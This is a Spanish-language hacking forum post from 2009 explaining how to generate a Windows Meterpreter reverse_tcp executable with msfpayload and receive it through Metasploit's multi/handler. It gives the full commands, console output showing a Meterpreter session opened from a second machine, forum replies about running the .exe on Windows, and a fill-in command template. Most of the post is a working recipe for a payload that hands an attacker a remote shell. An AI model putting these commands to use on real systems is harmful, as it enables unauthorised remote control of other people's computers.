Podes ver un ejemplo aquí http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menúshell@ShellRoot:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=5555 X > /home/shell/hola.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.0.5,LPORT=5555
shell@ShellRoot:~/msf3$
shell@ShellRoot:~/msf3$ ./msfconsole
888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit -j
[*] exploit Running as background job.
[*] Starting the payload handler...
[*] Started reverse handler on port 5555
msf exploit(handler) >
msf exploit(handler) > [*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.5:5555 -> 192.168.0.2:11735)
Cita de: L3F3RR37R4 en 29 Diciembre 2009, 21:42 PMel uso del multi/handler en msf lo puedo hacer desde win?Simon!, es el mismo Metasploit! Solo cambia el S.O
Cita de: L3F3RR37R4 en 29 Diciembre 2009, 20:46 PMhey, lo unico que debo hacer en linux es el ejecutable correcto?Simon! No podes ejecutar el .EXE en Linux
luego lo puedo utilizar en un win cierto?
./msfpayload [PAYLOAD] [<Parametros del PAYLOAD>] [Parametros de creacion del PAYLOAD X= Ejecutable] > [RUTA_DE_CREACIÓN_DEL_ARCHIVO]
./msfpayload windows/meterpreter/reverse_tcp LHOST=[IP_LOCAL] LPORT=[PUERTO_LOCAL] X > /home/Meterpreter.exe